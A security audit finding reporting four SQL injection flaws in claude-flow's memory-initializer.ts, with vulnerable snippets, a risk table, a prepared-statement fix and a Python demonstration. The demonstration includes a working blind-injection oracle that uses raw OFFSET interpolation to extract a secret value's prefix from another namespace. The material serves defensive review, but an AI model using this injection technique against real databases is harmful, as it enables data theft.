Security Audit Finding
During the memory system review, four SQL injection vulnerabilities were identified in memory-initializer.ts. All four build SQL text by string interpolation and rely on manual single-quote escaping instead of bound parameters; the numeric `limit` and `offset` values are interpolated with no escaping at all.
Affected File
v3/@claude-flow/cli/src/memory/memory-initializer.ts
Vulnerabilities
1. listEntries() - Lines 2132-2146
// Vulnerable - uses string interpolation
AND namespace = '${namespace.replace(/'/g, "''")}'
LIMIT ${limit} OFFSET ${offset}
2. searchEntries() - Lines 1993-1998
// Vulnerable - same pattern
AND namespace = '${namespace.replace(/'/g, "''")}'
3. getEntry() - Lines 2239-2262
// Vulnerable in both SELECT and UPDATE
AND key = '${key.replace(/'/g, "''")}'
AND namespace = '${namespace.replace(/'/g, "''")}'
4. deleteEntry() - Lines 2350-2379
// Vulnerable - same pattern
WHERE key = '${key.replace(/'/g, "''")}'
Risk Assessment
| Factor | Assessment |
| --- | --- |
| Attack Vector | Local (MCP/CLI input) |
| Exploitability | Low - requires specific input crafting |
| Impact | Data integrity, potential data exfiltration |
| Current Mitigation | Manual single-quote escaping |
Recommended Fix
Use sql.js prepared statements with bound parameters for every caller-supplied value, including the `LIMIT`/`OFFSET` integers in `listEntries()` (SQLite accepts `?` placeholders in those positions too), and validate `limit`/`offset` as non-negative integers before binding:
// BEFORE (vulnerable): the SQL text itself is assembled from caller input
db.exec(`SELECT * FROM memory_entries WHERE namespace = '${namespace.replace(/'/g, "''")}'`);
// AFTER (secure): the SQL text is a constant, the value is bound at execution time
const stmt = db.prepare('SELECT * FROM memory_entries WHERE namespace = ?');
const result = [];
try {
  stmt.bind([namespace]);
  while (stmt.step()) {
    result.push(stmt.getAsObject());
  }
} finally {
  stmt.free(); // release the statement even if step() throws
}
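As an added illustration of the `listEntries()` pattern (this is example code written for this note, not code from the page or from the claude-flow project), the script below uses Python's standard `sqlite3` module in place of sql.js, since both drive SQLite and the query semantics are identical. The table layout and rows are constructed for the demo. It shows that the single-quote doubling does block the obvious break-out in the string position, that the raw `LIMIT`/`OFFSET` interpolation still hands a caller a boolean oracle over rows in other namespaces, and that binding all three values (plus an integer check) closes both.

```python
# Added example (not code from the claude-flow project): shows why raw
# LIMIT/OFFSET interpolation in listEntries() is injectable even though the
# namespace string is quote-escaped, and how binding every value fixes it.
# Python's sqlite3 stands in for sql.js; both drive SQLite, so the SQL
# behaviour is the same. Table schema and rows are constructed for the demo.
import sqlite3


def make_db() -> sqlite3.Connection:
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE memory_entries (key TEXT, namespace TEXT, value TEXT)")
    db.executemany(
        "INSERT INTO memory_entries VALUES (?, ?, ?)",
        [("k1", "public", "hello"), ("k2", "public", "world"),
         ("secret1", "private", "api-token-xyz")],
    )
    return db


def esc(s: str) -> str:
    """The page's current mitigation: double single quotes inside the literal."""
    return s.replace("'", "''")


def list_entries_vulnerable(db, namespace, limit, offset):
    # Same shape as the finding: namespace escaped, LIMIT/OFFSET pasted in raw.
    # ORDER BY key only makes the row order explicit for the demo.
    sql = (f"SELECT key, value FROM memory_entries WHERE namespace = '{esc(namespace)}' "
           f"ORDER BY key LIMIT {limit} OFFSET {offset}")
    return db.execute(sql).fetchall()


def offset_oracle(condition_sql: str) -> str:
    # SQLite accepts any integer expression in OFFSET, including a scalar
    # subquery, so a caller controlling `offset` gets a boolean oracle:
    # offset 1 when the condition holds, 0 otherwise.
    return f"(SELECT CASE WHEN ({condition_sql}) THEN 1 ELSE 0 END)"


def leak_prefix_vulnerable(db, key, candidates):
    """Blind exfiltration through the public namespace: with LIMIT 1 the
    returned row is k1 for a false condition and k2 for a true one."""
    for prefix in candidates:
        cond = f"(SELECT value FROM memory_entries WHERE key = '{key}') LIKE '{prefix}%'"
        rows = list_entries_vulnerable(db, "public", 1, offset_oracle(cond))
        if rows and rows[0][0] == "k2":
            return prefix
    return None


def is_page_arg(v) -> bool:
    # Reject bool (a subclass of int), negatives and anything non-integer
    # before the value gets anywhere near the query.
    return type(v) is int and v >= 0


def list_entries_safe(db, namespace, limit, offset):
    if not (is_page_arg(limit) and is_page_arg(offset)):
        raise ValueError("limit and offset must be non-negative integers")
    # Every caller-supplied value is bound; the SQL text is a constant.
    return db.execute(
        "SELECT key, value FROM memory_entries WHERE namespace = ? "
        "ORDER BY key LIMIT ? OFFSET ?",
        (namespace, limit, offset),
    ).fetchall()


if __name__ == "__main__":
    db = make_db()
    print("escaped namespace payload ->",
          list_entries_vulnerable(db, "public' OR '1'='1", 10, 0))  # []
    print("leaked prefix via OFFSET  ->",
          leak_prefix_vulnerable(db, "secret1", ["zzz", "api"]))   # api
    print("safe, bound paging        ->", list_entries_safe(db, "public", 1, 1))
```

The oracle only needs the public namespace to be readable and `offset` to be under the caller's control; each query leaks one bit about a row the caller was never meant to see, which is the "potential data exfiltration" impact listed above. Note that the fix is two-part: binding stops the value from being parsed as SQL, and the integer check stops a non-numeric `limit` from reaching SQLite at all.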
Additional Recommendations
- Add input validation using Zod schemas
- Add path traversal protection for the `dbPath` parameter (resolve it and confirm it stays under the intended data directory before opening the database)
- Sanitize error messages before returning to callers so that SQL text and filesystem paths are not leaked
Priority
HIGH - Should be addressed before production use.
Identified during security review in PR #1029.